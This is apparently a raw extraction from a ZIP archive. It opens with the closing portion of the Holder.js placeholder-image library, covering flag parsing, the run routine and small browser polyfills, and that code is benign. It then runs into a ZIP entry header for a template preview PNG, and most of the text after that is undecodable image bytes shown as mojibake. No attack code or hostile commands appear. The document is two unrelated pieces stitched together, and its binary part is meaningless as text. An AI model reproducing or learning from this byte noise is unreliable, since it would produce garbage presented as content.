		if (el.holder_data) {
			var holder = el.holder_data;
			var dimensions = dimension_check(el, app.invisible_error_fn( resizable_update))
			if(dimensions){
				if(holder.fluid){
					if(holder.auto){
						switch(holder.fluid_data.mode){
							case "width":
								dimensions.height = dimensions.width / holder.fluid_data.ratio;
							break;
							case "height":
								dimensions.width = dimensions.height * holder.fluid_data.ratio;
							break;
						}
					}
					el.setAttribute("src", draw({
						ctx: ctx,
						dimensions: dimensions,
						template: holder.theme,
						ratio: ratio,
						holder: holder
					}))
				}
				if(holder.textmode && holder.textmode == "exact"){
					holder.exact_dimensions = dimensions;
					el.setAttribute("src", draw({
						ctx: ctx,
						dimensions: holder.dimensions,
						template: holder.theme,
						ratio: ratio,
						holder: holder
					}))
				}
			}
		}
	}
}

function parse_flags(flags, options) {
	var ret = {
		theme: extend(settings.themes.gray, {})
	};
	var render = false;
	for (var fl = flags.length, j = 0; j < fl; j++) {
		var flag = flags[j];
		if (app.flags.dimensions.match(flag)) {
			render = true;
			ret.dimensions = app.flags.dimensions.output(flag);
		} else if (app.flags.fluid.match(flag)) {
			render = true;
			ret.dimensions = app.flags.fluid.output(flag);
			ret.fluid = true;
		} else if (app.flags.textmode.match(flag)) {
			ret.textmode = app.flags.textmode.output(flag)
		} else if (app.flags.colors.match(flag)) {
			ret.theme = app.flags.colors.output(flag);
		} else if (options.themes[flag]) {
			//If a theme is specified, it will override custom colors
			if(options.themes.hasOwnProperty(flag)){
				ret.theme = extend(options.themes[flag], {});
			}
		} else if (app.flags.font.match(flag)) {
			ret.font = app.flags.font.output(flag);
		} else if (app.flags.auto.match(flag)) {
			ret.auto = true;
		} else if (app.flags.text.match(flag)) {
			ret.text = app.flags.text.output(flag);
		}
	}
	return render ? ret : false;
}

for (var flag in app.flags) {
	if (!app.flags.hasOwnProperty(flag)) continue;
	app.flags[flag].match = function (val) {
		return val.match(this.regex)
	}
}

app.invisible_error_fn = function(fn){
	return function(el){
		if(el.hasAttribute("data-holder-invisible")){
			throw new Error("Holder: invisible placeholder")
		}
	}
}

app.add_theme = function (name, theme) {
	name != null && theme != null && (settings.themes[name] = theme);
	return app;
};

app.add_image = function (src, el) {
	var node = selector(el);
	if (node.length) {
		for (var i = 0, l = node.length; i < l; i++) {
			var img = document.createElement("img")
			img.setAttribute("data-src", src);
			node[i].appendChild(img);
		}
	}
	return app;
};

app.run = function (o) {
	instance_config = extend({}, system_config)
	preempted = true;

	var options = extend(settings, o),
		images = [],
		imageNodes = [],
		bgnodes = [];
		
	if(options.use_canvas != null && options.use_canvas){
		instance_config.use_canvas = true;
		instance_config.use_svg = false;
	}
		
	if (typeof (options.images) == "string") {
		imageNodes = selector(options.images);
	} else if (window.NodeList && options.images instanceof window.NodeList) {
		imageNodes = options.images;
	} else if (window.Node && options.images instanceof window.Node) {
		imageNodes = [options.images];
	} else if(window.HTMLCollection && options.images instanceof window.HTMLCollection){
		imageNodes = options.images
	}

	if (typeof (options.bgnodes) == "string") {
		bgnodes = selector(options.bgnodes);
	} else if (window.NodeList && options.elements instanceof window.NodeList) {
		bgnodes = options.bgnodes;
	} else if (window.Node && options.bgnodes instanceof window.Node) {
		bgnodes = [options.bgnodes];
	}
	for (i = 0, l = imageNodes.length; i < l; i++) images.push(imageNodes[i]);
	var holdercss = document.getElementById("holderjs-style");
	if (!holdercss) {
		holdercss = document.createElement("style");
		holdercss.setAttribute("id", "holderjs-style");
		holdercss.type = "text/css";
		document.getElementsByTagName("head")[0].appendChild(holdercss);
	}
	if (!options.nocss) {
		if (holdercss.styleSheet) {
			holdercss.styleSheet.cssText += options.stylesheet;
		} else {
			holdercss.appendChild(document.createTextNode(options.stylesheet));
		}
	}
	var cssregex = new RegExp(options.domain + "\/(.*?)\"?\\)");
	for (var l = bgnodes.length, i = 0; i < l; i++) {
		var src = window.getComputedStyle(bgnodes[i], null)
			.getPropertyValue("background-image");
		var flags = src.match(cssregex);
		var bgsrc = bgnodes[i].getAttribute("data-background-src");
		if (flags) {
			var holder = parse_flags(flags[1].split("/"), options);
			if (holder) {
				render("background", bgnodes[i], holder, src);
			}
		} else if (bgsrc != null) {
			var holder = parse_flags(bgsrc.substr(bgsrc.lastIndexOf(options.domain) + options.domain.length + 1)
				.split("/"), options);
			if (holder) {
				render("background", bgnodes[i], holder, src);
			}
		}
	}
	for (l = images.length, i = 0; i < l; i++) {
		var attr_data_src, attr_src;
		attr_src = attr_data_src = src = null;
		try {
			attr_src = images[i].getAttribute("src");
			attr_datasrc = images[i].getAttribute("data-src");
		} catch (e) {}
		if (attr_datasrc == null && !! attr_src && attr_src.indexOf(options.domain) >= 0) {
			src = attr_src;
		} else if ( !! attr_datasrc && attr_datasrc.indexOf(options.domain) >= 0) {
			src = attr_datasrc;
		}
		if (src) {
			var holder = parse_flags(src.substr(src.lastIndexOf(options.domain) + options.domain.length + 1).split("/"), options);
			if (holder) {
				if (holder.fluid) {
					render("fluid", images[i], holder, src)
				} else {
					render("image", images[i], holder, src);
				}
			}
		}
	}
	return app;
};

contentLoaded(win, function () {
	if (window.addEventListener) {
		window.addEventListener("resize", resizable_update, false);
		window.addEventListener("orientationchange", resizable_update, false);
	} else {
		window.attachEvent("onresize", resizable_update)
	}
	preempted || app.run({});
});
if (typeof define === "function" && define.amd) {
	define([], function () {
		return app;
	});
}

//github.com/davidchambers/Base64.js
(function(){function t(t){this.message=t}var e="undefined"!=typeof exports?exports:this,r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";t.prototype=Error(),t.prototype.name="InvalidCharacterError",e.btoa||(e.btoa=function(e){for(var o,n,a=0,i=r,c="";e.charAt(0|a)||(i="=",a%1);c+=i.charAt(63&o>>8-8*(a%1))){if(n=e.charCodeAt(a+=.75),n>255)throw new t("'btoa' failed");o=o<<8|n}return c}),e.atob||(e.atob=function(e){if(e=e.replace(/=+$/,""),1==e.length%4)throw new t("'atob' failed");for(var o,n,a=0,i=0,c="";n=e.charAt(i++);~n&&(o=a%4?64*o+n:n,a++%4)?c+=String.fromCharCode(255&o>>(6&-2*a)):0)n=r.indexOf(n);return c})})();

//getElementsByClassName polyfill
document.getElementsByClassName||(document.getElementsByClassName=function(e){var t=document,n,r,i,s=[];if(t.querySelectorAll)return t.querySelectorAll("."+e);if(t.evaluate){r=".//*[contains(concat(' ', @class, ' '), ' "+e+" ')]",n=t.evaluate(r,t,null,0,null);while(i=n.iterateNext())s.push(i)}else{n=t.getElementsByTagName("*"),r=new RegExp("(^|\\s)"+e+"(\\s|$)");for(i=0;i<n.length;i++)r.test(n[i].className)&&s.push(n[i])}return s})

//getComputedStyle polyfill
window.getComputedStyle||(window.getComputedStyle=function(e){return this.el=e,this.getPropertyValue=function(t){var n=/(\-([a-z]){1})/g;return t=="float"&&(t="styleFloat"),n.test(t)&&(t=t.replace(n,function(){return arguments[2].toUpperCase()})),e.currentStyle[t]?e.currentStyle[t]:null},this})

//http://javascript.nwbox.com/ContentLoaded by Diego Perini with modifications
function contentLoaded(n,t){var l="complete",s="readystatechange",u=!1,h=u,c=!0,i=n.document,a=i.documentElement,e=i.addEventListener?"addEventListener":"attachEvent",v=i.addEventListener?"removeEventListener":"detachEvent",f=i.addEventListener?"":"on",r=function(e){(e.type!=s||i.readyState==l)&&((e.type=="load"?n:i)[v](f+e.type,r,u),!h&&(h=!0)&&t.call(n,null))},o=function(){try{a.doScroll("left")}catch(n){setTimeout(o,50);return}r("poll")};if(i.readyState==l)t.call(n,"lazy");else{if(i.createEventObject&&a.doScroll){try{c=!n.frameElement}catch(y){}c&&o()}i[e](f+"DOMContentLoaded",r,u),i[e](f+s,r,u),n[e](f+"load",r,u)}}

//https://gist.github.com/991057 by Jed Schmidt with modifications
function selector(a,b){var a=a.match(/^(\W)?(.*)/),b=b||document,c=b["getElement"+(a[1]?"#"==a[1]?"ById":"sByClassName":"sByTagName")],d=c.call(b,a[2]),e=[];return null!==d&&(e=d.length||0===d.length?d:[d]),e}

//shallow object property extend
function extend(a,b){
	var c={};
	for(var i in a){
		if(a.hasOwnProperty(i)){
			c[i]=a[i];
		}
	}
	for(var i in b){
		if(b.hasOwnProperty(i)){
			c[i]=b[i];
		}
	}
	return c
}

//hasOwnProperty polyfill
if (!Object.prototype.hasOwnProperty)
    /*jshint -W001, -W103 */
    Object.prototype.hasOwnProperty = function(prop) {
		var proto = this.__proto__ || this.constructor.prototype;
		return (prop in this) && (!(prop in proto) || proto[prop] !== this[prop]);
	}
    /*jshint +W001, +W103 */

})(Holder, window);
PKԜ�\"M�+�^�^purity_iii/template_preview.pngnu&1i��PNG


IHDRh+*�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:62924BF0858D11E3B45DB2CF94168121" xmpMM:DocumentID="xmp.did:62924BF1858D11E3B45DB2CF94168121"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:62924BEE858D11E3B45DB2CF94168121" stRef:documentID="xmp.did:62924BEF858D11E3B45DB2CF94168121"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��pA[QIDATx���]�u&X��w_~�3���E�IQ��dK��i$Y��=�z��8�ؚ��x��Z����xF��O�eY���HQLb&@������_N7Tت{_7@#4��~����޺U�s��9��w��! �-���@�h��6� �h�0�4�sCM�����i@�Q�q�s�ڹ�*((�q��쒯�$U�q�!�Ԛ���/�\D���1q&F�*
s�5ɓ#f��F�%p�����;	��*B
�.AM�ὁ�Z�(�rɮ(�",J<&	o�Ԃa��ht�ʵ�-I-����ѵ�#Cؾ%�ai����YX��򍰕������p�=2�Z�GE���V�j������ů�-C5R�H�,�J�t>��_y����o�5Q�\��TUo�OO���It��4��'�,0=m�w���S�J���ǎ��;_84u�H�w[oɣ�����%�]To� �
��>�H�BFH�@�d��0�т+J	8�ō�N	�����9_m���G#GP���g+Ʊ�
�lA�Йb�2��c$<�\�ޗ4�
�&C#�N��5	�I�͖?_R�y�#e%tTlz�F�F�D�F`[�G�H�����7���2n�:o�636^(����N���<�0D��>q=�LAf:�H"n�$��J�pNs	��LBF�-*�Ҡ겴�7����娖M�$�i��T*Z��t��Rh�+a���8��a���Vnxu��f�X4���X*&��*���,1W,V�����I�=*"�f��
���]#n�NLL}{�06,@`�֏��(_��<�?�5��O߷�'cjn�;�w��Lĭ4�SM�k#+�����2O�����Ý���w+�ן8���]=���;S����_Ӎ80c��|��j�����I��$n�vRVOrM�w$���I�R�3����]���bݧ�H�o��i�/�?��r�v
uv��ξT��X�{�ҽq�e@��\�2nix[wR��ބA�����X|�Ŭ[�2qv�b����D�D�=����=�:2b6Ę:�+�7��S�{G;:-D1�ŷd-�7�x�]�ҡ�ě�s-�[.�n��;��tM�J�u��t&�2V�2ߺ�C� n�iDŽ���Mg��G�2�m��*��ڙ��<���B��g7���3ڕ�k�#���

��\����l��I�Y�����\\ǂ
�1�m=��x:f��FӷM���yˍ ��=���}�K�VЖP��f���9�(x��v���^�䞭����,��t›j�X&���ۧ&^Y�MN㎎�`(���vu~��\�rB��	�b� ��'3���Wg�<��8�៘�6R�����F�Scc��V���b��Ó�\�tth���g��L�;2[+z�;��)�O��b8�[w�I��,U�b�}yb9fh�j`�^�}�d۶���K�D�������9�Ԍ�lL#d��9�9��.�0�3��'bn��ӗ�[��W�`Ab|�,���?Y�'����L��-xn8����(J��1mDѪ
1������%��ю�Ԗ�-�#M�S��Bʘ)6j>K;�%:�b��u',�ue!����b�0�^���{�M�+i�,��aC��{�z��'�k��	�&`,e�P����KB��N�c=iɛ\Y����(b�O��s�G�sK�m`�Tn��K�8��	�O�~���r��_���n�+�Y�����8Q{�����B�t��ѫ������sWδ�����ĐҔc�ZnЋ�8�N�d�=9��k���U܃s��}�{�Ϗ��=�h���m��׼l��r�Z�;Y�� ��s��s���P�9p1��'1�EC̢����V��-C���B�
fA���d!w���X�0-�u_8�o0�Pm�<Vm-_�JS��&�&���uj�Ԏ�w������2��|���pJ�JMQ��5�M��;�����bS��[����O���ŚNnj���srmz���'��@(4>A�'
��ӛ �{4�oL�Z����tf*�����B�;<W.��r�5Uj	m�~�RC�-�*-ߥ�3e	�EA΄L�i�:�X{yrYv������J��ɲW-���tAt�3�ȅ$�a0S�Vo(}d;�I��L�:��#<���0Q�.�bg��&�hb ��F��4¤�Að��M��u�!1�@�}i���Q&�,�cxh�
�+FIq�Զ/�<�#	^�+�3��[*F?纮3��3i�Eҩ��I�d$�@i�8<�a^�@��0�#,-8�Z�@B0�\</�I�%�-ơl�e��o�m'�6S�5y��
M�T�(�P�(���,J���X�x��|��)*��8�`�QZ�q�^�1�/GvHA_LI����ī��ЙoG��9��K�]5���:��p�N-�W"`�VϺduU���*�Q��BX�"��kG;B|�e�u�̆���c

�'������a\?{U�x".�*!0�v.�8�yk�>x�,���uz��-�{_W��/�x��r�j�T���#P�9�1od��`�axq��x�1�0s5!2p�9(�B=�]�y^z���¨�n��%-��9�Dr
?�ġ��֌]]�8�A���U�/w��6��Vmn�17g�QU.T�d�	��	P������}�&[UQډ��"E


�8q((((D�)��Gfx���Z�IE]�C]�z�\	�xM^ߕ��\�"���u=>���^��@��]��.��m�p���[\v,/��Ԁy%�;�P�1�00���2<��]�f���9 
Kվ��Aī!@��f�|*�me���&n[�<_y��qxp%4�x|*�,�/�&Mt����;N=}x��_ʗ	?�<���%~罃wv����'k^\�]qN�߻����������x���K���_=}�ˇ
.����.ƒ.j���ܗ^���W�u��'��{��������M�W:��m}䡑�oKU=
O'OJ�|�{~���#�f#1}*
�\����ɷ�,�>���T�H.C��޸�h�E6F�g������}[>��������,�5 ��~pǃ=�w�,���s����c��{�nMj�~}�s�-�9�+⸁�
޾�맶'�f��_Η?sDf����y[���W瞘�1t��O2���kT����q1�|��#۳�O�.��m�Y)���۶d�5���W���ź�R1���
�����<�x��L��d߿;���_l��*�~�X$6c\1>ڝ�g{sS]�W������AoW�?<�s�M�,����.�|�{Fs�ߝ2��_�
���t|�X��-�l����,�C�����=o�Z�sOͅq�q�Ȫ
d��(|�9�6��g�sɟ�~X����O���F*j�|��j�$�νڹ8��Rx�7#Z	� a���_���y�����c8�{;����\�.�Wo	�W&��:(U��&�
�wn�Ⱦ�����,㷅���Map�A� ]��PS���ݜ��nF�h��<�;J��Yzk��g2�Ӆ���
�<[Ӈ�9��ʩ�����%w}����Ix�0q���B��Z(z�z��^�
2�e�ui(��q����Ε��N�\;:l�~�S߻w�?�o�[�u����>�α"��"9��((�v���Ȥ\JR8��V ���4���ڟΔ9�T�!#ZR_�-q�$|����N����>�F==�����w��C�<�)�fv���a%m�����:��B�������X֌kp���o�&����#�׽�`�T=N8Хh �L�X5	��t�@ǖ�K-9&��&��}1��ZM�fic2������Cn��W�߶=��d����Z��Hh�!���BBC2�GD����%�U)�Oo��#�ͅ��5D�3yx� S����@L�8��,�(_��&��e�X�eIǥɿp�o��uC��#U/ݕ���|p,��h�M�N.7>���߽V�QW/&#V�Q��l��[If-�#X��ɥ����_+�P�<������JY�j�\&H��;~|�W_>��=�m{�@�<�f~��k@��?��W��ʘ8 ���>�������gI�Д�$v�����M�x�	@&i�)�k�Co���{}��~�DYH�$�7����VX���o{y��������}���%h��w��4�P��ޣ�6������o��Aώ��O�yǀܽ��?��_}�+ӕ�<3s߭�?�=��''>���0VMW����wo��|�'��S�]RıQ4|ڨ�Rh��i��-׃��.k����~h�[��w�F���R���`���Т7�U�{o��GF��wDm3妘��u;Ci{WO|[��<=�2�v��:�G��l��%7�Ո�dc�������քvx�ё��ƍ_y��p-����?Q
vw�z��|d[�
���<Ќ�"ĵ�t�!�z�5e�ž���ә͇֎�	�'c��=�$	
FY8��殞ԯ?8�ĭd�0o�i����H`��x�@r !I���h�c2�'��������쳳%�D�Sޓ�?|��X���3����6iE�PG��n�Y&#�vP���R�Uѽ=l���hzf��}w���'_��=��7����<�o~�D����zm�?�oyk�3�����'�/�;���λ����o�؎��֗��.}>D2�=1��=
li;q��=�-�ı��b��\]O;�|d��d?��(��3���ӳn�����zw�󎱎�*T��;��Q4�4l����Iv���c9�m��X���h��P~�}�1��R�+?�a>�m���6��<ư�Kj�g�w�JK�r�D�����?}[�����B�q�@�;�ozVy�
��?0���J��I����Ʊ���,SW�_dž!��7m���u���M暖i���;��Y����;��#%�q^j�ǿ��u�/o�[�^�m,V��Q��n�{�H�Z���/��C�@�9�O�~��?��&~z_��'ks-&�.yJ���
�b�0*��\���~�cUi�9Q�‹oߒ������}�D�%�mL�4{�p���ͮ��(0�79glcKO܃X��y�S�~�h��w�ݚ�J�/�� ��Xp��N�\����� ��%I9�J�[�?8z��B����K�<^��ɥ���ڣ���{gǗ_+FY�2޺��B��%8�7ql�@�'��U��f?�L��1�(�Ω�ޞ��7_�h�FP�"�x^+6�z���ݹ�F3=��Ņ�yF2S�c�7��?���d%��2�w���җ�/�m8!F�HƜ�7�<K��<�k��t���F�B�f+�r�n���'J�	1�o���'�
r������=}��d�T�z��c�4H<�S�=��Q�SƆjtߓ��s�
i�"�\g9c�U< ңuh�B��\u�ux�m��1����M�S�?�ྎj�֡%y�(�P�q	��'/��oL,]����M/6�ş۵;+�*r!u[��Pu�g��ۿ�%�2�@JY�13:�Svƹ�rA	CIs !��W�k%����y{��:_��{�V&�ɂ�j���_%�$�J@�������ԋe�'�؊�C\���B�ɉ�?X|�d�%Ez	������sK�b���#����#���݉wlM��syA�;�2����W���YT��"�K��ɪ��N��սd�[�L)�L�M	K��c�`�B�L1F
�a�Ί�����K�>�ilk�
p���#��f���=��KK�<0�<:A!^]�e��nPn�6)8_PjY��K\2��r��NJ�qk���_<;����:t��:^�VH�j�+�TmA]��� 1�5�&ۜ�1�/��矙��k��p�q��"��}i�;m�f�𶟡�V�..�
!_(�sF�����P��\	
��ڻ��6��c����mC��SO�ڕΗݯ\jߒ�8q\Y�F̢>Yn@�g�8�T�0�(Wn�oRfiA�@p^�-�A�H����a#آ+o@����=	��h�\z5ƒ�x!��*Z!�N��t;�/�2�;b>����O/{wu��u���a=~��é��V�X���X5�����^��\�B�O�ѷ�˒LJ,R�)z�1����|��^�ݼ�Q�H�;��'�/�������lU�ƻ�r�|m��P��$
�C��뽯�[�|"#e┠�(�@��H"p�ƻ��BE;��^����?.1�'o�y�� �/��EW:��K�� �t>���޾3-ClT=� w�=��޽�_��w�P��|�
0�s��C��œ�`�`���񱽃qPwA�l��~|�rB����'�^�:�����/����Ah����|��>i�Xn�؃�����KJ���W�:�f��/_D]^���B�‡w���[;��_9\�{�.C���c�+Ue�����I��cQn���f���˳���ğ�Ԏ�l�/$^��-4��/1�2j��g���o�a1�1�>�#Z�E�Q#�>��O���{F~�=}�gkU�Ǻ�w�'���KS�i��(4���cܖzeb��3~�Ȳ��Ӯ	ۆ�u��C�r��S�)A���:��E��e;�_�[	_DR<�0�^�,>9�|�?���g{�ɲ��'qO��\k53��ե���$Tx�9Z|��C
�<)il�I��/��c�/�2������s��L�fk<�wN-4A�«�84�!D��*W�Jv

R�7e.ћ�8䋏�ٹR�B��i��*?���}�[�c(>�9���G�&�{��#�G��{+�
h{w,�z%��p�^�~󁡻�ۺQ9����Ǧ��33���R���Pι�7ΛM#��K�J�O��uݓ8l{x�aG��]�W��S?E�qp�U���턿�hj��2<}�軇�����O��Ց���o%�c����O���k���)��X�-[�w����uIZ���z`QG��}��%�np�1�g�k�sey�2Num��7���o��zbv��{��R�u������릾���YH��^���c;�;:c��.9�o�����mo+�2I{GGr0_�y��yGO|(i�竓�F�&f�ᜳ{ 9�1-*��ʑ�f���%��ŭ?�О-z�}�\���'q�U���I�S��x�
�z*�a�:���q<_�(�P(wl}{W<���|c���S�J��|�eG�̀�c�e�h��I������K#���nJ��lN����K%
w
$c���+.�S&��Ú/�曧J�<�X{{�͖wd�^�y����s���pB���Ǐ.6�C.�����sp���x!���F�t��B�UGDchp�+�m�J��R34o	D��ft4[i�Xn�q���5�se�+�:m�VYN.�
�#)��ŏ�mE/������*�8�¹nmu�,����(jm��/����{ǐ��;4^��x��Z���#�G8��B%$L�.�
���s��-
E��?ړF6;�dyy�cu��G/E�Hn�+��|*4������~��/�źoD���N�~�����8��+U�G���y�sV�;EO
d(�(�:�t�V}x�=`9��EDe�5B<��Ff{��ߞ����]���p�ڱs�:�.�Brޘ�JJ8��W_
_)�W�����n8z�[����5}�z���}���������utq�����v�i+7%q��;����9^ti��7�u}_��W?������K]�s��\7�%�ن�
��%	�ғ����z,tۖ���M?5^�X0ax٭��C��:����OB������q
�]������Oz��7���2��|�6��x���;;��b�{G�O�������C���s"�Q�7�_FA�*
7�l�8hPz�J���Ai�o$���8*&MB7�ZD(��
�B�w�f��\��qo��_e�~��(��"�]���2���Q摄cZQ�]~�B�p,S.
����¶7&�نc�����ZN���7c��\^�Y�9>�|5L]T/�4�k
�Q�
o����~�e�}�`!_�C(J��)�}��gT49S��޵��w��BMz�&�*�0k
��Fi�<zチmY��LI�2�anj�2E�S��Kg223a���<^ke��o���Z�̴�z>m;0D'S�v0�R.�z	i�-�a~fRB@�W�0s�L�"�y�h�=#�#SKLy�����QJ|P6���b1"��`<�،�rĘ�J����P>����u��;s��SŁ�	�cӥ��tb�]���������ݝ�Y�Xi=yx���w��3�pp!i�F��1�џ�_�̗�2��vt�����r��ù�1_�~��|:����-[;��c㋂���v�?Vh�ۖ)�U
{3�`�/�1��t� �`��dyl����թ��l:����4f?<�0^��m`4�?b������w��n��}mr�4��w��ݙ��\~y�v�-û�Ƌ'�����FAI7qh��{��
d��M���;�t�Fs�[;��պ;ԛ{x4����]I�3K5h[��v�����E��ݳ�C�Ý�8bS5߉鎥o��$����lIF2L�3a�.�=�KYB%��gc��ݙxO26��#ϯ؝4N�eoh ��#����>�\ӷf�!Fv�FrD�;i5|�w�{��s�X:���>��V_.9ڝ����bc{o�7�J�KU�kc����l3�Xc��Rcl07��s�;�~t��ZUA�8N�1�g��(���6�w2&<1�����O{2�~G[l�{�&�ՖP
LC+֛��/�j�HGB9[��8�)}f��&�/4)�k���S���K��q�rg�s���\����z��?�2���:���yf�t�d��Am_o��pS��h֚)4b��5k�ro>�/7k�kw/��|]�^W*�s��O�4up�ћ���,?�n����kC��W&�ϔM���k�{�CI#ai��2آ�>[.V<��8�G�6�X}��iӉ=4��|a�#���:l��ᾎ�zu�q�pNct��
�2&g_6��;!f���)A7��B�ǜS�2	sx0{߶�Ѵ��Ӌ�og��C��zRc��B��t��$�H;��q�#���pg�?eCƁ���:A�]���r<ߚ2�<~�Pv�P[�=){�P���m]��\,�B��yD�ڟu�f��Š�\���Dwܘ/5u��֛:����R�e�th�^n�����%q(UEa�6��-ך�s�"G���ʉ��J�oKǭ}�CS���z���J��z&��-M�nn�@��Je�C'�_]lt&��&F�����ƶ�����B��Ӊ��Ѣ+ί7�R�0�Lź&DPhu�4�`����8˕%w�֮�.�Tk�6[�Pw,��O.QA.�����3��E	5�?4�đ1��vba��[�Z���]��\�����C�|��������mgO6�^8���2��Ɨ�T|wW�6Uni:^�6�i��N̗�r�S���}�ʘا��q��7<��x*fC0[u[K9:`�NxRh.��A��i�,r�Pu]��.ƶ8�*� `�q+�Ù�F6bb�X�Giݓ�S��!X�h�P݂��Y��(�.�Iˀ���td�W�-�4\�C����-��1|"s;xܿ��'���� ��Y�r�PO��0+D��v�D�j��"��$mB�ي'�N�L���cu:Z��\"��(a��+�E��Y ���E���2�eW�
��Kz7EK��+�Q��
`Ս*�B]����a���#6?	�����������_u�fad��&�J(���g]�黇�S��s�S� ���7A�2����?ǀ�v�A�"a42��f��C�F��,]��y��r#C�q(l�4]��,��R���CA�b�V�R��߳jE


�8q((((�PPP��VU�7DTQ�\�~iHE�Qġp%Ax�1����1����C�d�-4T��%6���6Wu���ez��5�����.SPġp�T
���|�!s�^�j
���5MmxUġp�A9gQ8��~��0�2o\�j�j��S�P���CA�K��(�!(�r�[ 
�a�0�nG�8������� 2�
_�z88�Bp�#`%����Yq(\G��wt�;�,U�:Rt����pI
M"c�غ:�8��L�
Y���Ųb:T�iV"c�8�Ԥ�E3�ddk�Tآ���ai2-��e��	�B�S9
q(\?����;�Y�o뎿e+pb�H�<�S~r�2_#�m��3��K�޿�7�KH�V@l�l�d�dS�m=q�H���1�bu��ߺ��φO�,W�����[:s�}g�d�V�K{�����[�zlʋ/)(�PxËT��w
�g�_~q��˱\��7
�'���2p����ޝ���9����'�oK�OL���,���qo���JY_R���R�ښ���٢����8�X�d��+�L�>0���RL����C��L��sBS�zy��ak�ǖ\6֝x�+���l���%n��^[x|��X��?�eo��B�"�3e��s���{c�x�Hh�`���q۰1�c��>��ŗ+���2��u�PLC��kպK�TׁZpUġp=�UL���%��0�[��M��4Pj�@�k�<�F���$m�t���N;��m�=C陒;ݐ�K�`��L��R��M����>�y~�rh#�)3M}�_����ȁ���ю��C¸Zܹ��\o��/m�/�'W��&-
�V��1��8{�dyN�F+����3��:�	�0Q|y����͚�u��ʏ��\C-?X�3��AQ�L��ix����
��?[��x��K{��>v(����p̟=Y�m��S�V���	&(N70�/���
�	T���
>�s$���|�[U��`Ҭ����t��\�B��d��h��y��M�|SJ#�rSC�C��hW�\�l���md
4W��H�`<3l�j2Kc6���[DC(a�a-rn���]qG�/�,�ub��(\{�X(#����u$U�p���YQ�
�Z�Y�_���g{|{
�@5?�8Bnhm_����@��DP��Ei( ��uM�)�8�7M�7��oiE=
iè�љrh�g�g_�E���.8(!ↅR,ot�
%q(DT@87�j��A�)�P��ab3����:s��ă�rk�z��8�0ʭ�/m���d
!pm��R�T����&J��Ko��)/�����
�86��u�牰J7��C�p�i
׸�&PPPPġ����CAAA����"E



�8q((((�PPPPġ����CAAAA����"E


�8q(((((�PPPPġ����CAAA����"E



�8q(((���ɤ�



#���VPPP�q���FU+(((l�s��(((l�8�����CAAA����"E


�8q((((�PPPPġ����CAAA�����"E


�8q((((�PPPPPġ��p�T\(!x�+�U@(c��@mW��!��vP�qe155���O���2�E����q��l���T4�+���%����y�]����=q\�����?}�k�f���|�8N�qw��-l�@'�TP��������D���s���W��]�{zz�֌ȣ��Dž��J��h|��G��>�k��Z�"����0MS�WSN�^g�	�P/b����x���/+��X߮�):?7wHACp��w���N��L���^���@q�L}M�����r
�w�1�1��=�3斚�o:�r�MC�1�����\38ī�OHs�5q\���	�m��c���ʢ�
`�u���}[Ga�������0<�IJ�8<K�9��3N�k
�k��k0���i�t����A��

Z��XEW�7�_o��k$q1F�r��Yf�K�%�hx�G-#]v�:%�fYz��4�u�YR� �����d-�@1m%�(N�)a
r��m��GS.��U�N�P#,�ɢdAW�>De���|luq+�b��%l ��q�K��j&7IfTġp1�3�L��xo��G�n�%�rp	���/�X��'mAB���
v�7Zu�@�hz�NS"�����FȷH�Pʀ���d(
���7P���<qA��,MT"��sK@`����e������p�#��k���U���f\�����.7,���p��LlT�n��:�ܡ���
�i��x��c�$���
\��
�f�#���ͤuͰ�b˫�]�婄��d�x��<�;m��!�A���
�|���x���L��1O98�4�R�Q?4���N<i	u��V�@�eb$8B��Lѝh�a�H:�qM�.����U�wIp�yi�������t6�䑢�)6��%`��@5q\�`���z~{0]BG�<]H��^��ںP�+^@3��J��*,���'g�����.�o̔r�P/L�+ٿX|!��څ�5w��b��"��ח�<�UqB��*HDp��C��!���rk��3IX��N����WӆiY0_kx�B�,�lc�2q\C怐�^ �p��K�����f�p^��*�
�jJU4
��)���S$Ma)�aG�PĀ�tK�-�b���K�X%�����j�@TNkm�	j�i���׶�D�4����*�(��r��Y�V�4����q9iy��Oq\CS������+�p��E;	bg�~�S+���"R�
RP���B$@P��q�
XA5X;����L��sW���P�'-�Z0z��/����Cǵ�ؖ{�etb������@P'�.���F�' n�	Sj(�M��j���p#^�F^�6��`���E׿��/��kg�`�Y��s��4�
��V�ɾ�>�
�@�cUW��"5�*(�P�wЪG)�;q(l�;��;��;q(lT�p)S:��"����(�CA��%�,L�;q(l�;��O�;q(lX�5��uE
㎺�Yq(\�΢�;q(\���w(�PPġp	ܡtE
���@�
�	�;�f�.�C|J�H�Um��$���;Hͣ(�EA��F���ъ��*(�Pظܡl�
�8.�;�΢pIP�ћ�;ڶR�4���*(�Ca�r��w�QPġ�a�ibT�((UE�_\����D��I��Y�L
�8����|�u��E���8����9��
Pȣ��E��W����ض^����LRӐ)��ˌ��]��	(�Q]����ġp5@y���L<W�co8m��7]�e�p(:���q�5�̷H�8�gf~b|(e)J@��ŚO	�[(L2���E�eVP��ؖ��
F`��*�|�
$������uZ��Z ��S��`�+9QƲ��3����	gՀ-6���ء�C�J[%�`l(������F��ݻ'06]^�c�`��}o��;g��ܘ/;�
X!�e�G؛����˭�;�MMb
d��0�-ʨ<�'u��`�NW����[3�9��Ɋnia�9A
�hX�4�l]O���,4&�Ң��B<AU���4��K̗�I��c��x�3c��<q(\i�bnL�C`����|^�H����O�%͗f���9å��Sq�M���>^l=7WG��m
